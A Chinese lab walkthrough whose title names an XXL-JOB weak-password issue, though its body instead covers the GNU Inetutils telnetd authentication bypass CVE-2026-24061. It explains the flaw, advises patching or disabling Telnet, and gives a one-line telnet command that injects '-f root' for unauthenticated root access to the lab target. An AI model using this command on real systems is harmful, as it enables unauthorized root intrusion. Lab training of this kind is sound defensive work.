【靶机实战】XXL-JOB 弱口令命令执行

靶机信息

可以通过访问极核官方靶场开启靶机实验:极核靶场 -> 渗透测试靶场 -> Inetutils – CVE-2026-24061

漏洞科普

CVE-2026-24061 是一个存在于 GNU Inetutils 宏包中 telnetd(Telnet 守护进程)组件的严重安全漏洞,其 CVSS 评分高达 9.8(危急)。该漏洞最早于 2026 年 1 月被公开,影响了从 1.9.3 到 2.7 的所有版本。由于该组件在处理客户端发送的 USER 环境变量时缺乏必要的过滤,攻击者可以通过特定的 Telnet 登录选项注入精心构造的参数(如 -f root)。

当攻击者利用该漏洞时,telnetd 会将未经清洗的变量直接传递给系统的 /usr/bin/login 程序。由于 login 程序识别 -f 参数为“强行登录且跳过密码验证”,攻击者无需任何凭据即可远程获取目标系统的 root 最高权限。鉴于 Telnet 协议本身缺乏加密且存在此类高危设计缺陷,安全专家强烈建议立即升级 GNU Inetutils 到修复版本(如 2.7-2 或更高),或者彻底禁用 Telnet 服务并切换至 SSH。

靶机实战

首先打开靶机,获取靶机的地址和端口(注意:非WEB应用)

图片[1] - 【靶机实战】XXL-JOB 弱口令命令执行 - 极核GetShell

使用以下命令即可直接RCE

telnet -l "-f root" <域名或IP> <端口> 
图片[2] - 【靶机实战】XXL-JOB 弱口令命令执行 - 极核GetShell
THE END
想说的话 1  QQ & 微信交流群: 点击查看加群方式
2  本站运营不易,以真心❤️换真心💕,如果帮助到你,可以 推荐给朋友 或者 开通金贝会员 支持一下本站!
3  请不要进行任何非授权的网络攻击,如果造成任何损失均由使用者本人负责,与本站和原作者无关!
点赞61 分享
茶谈区 抢沙发

请登录后发表评论

    暂无评论内容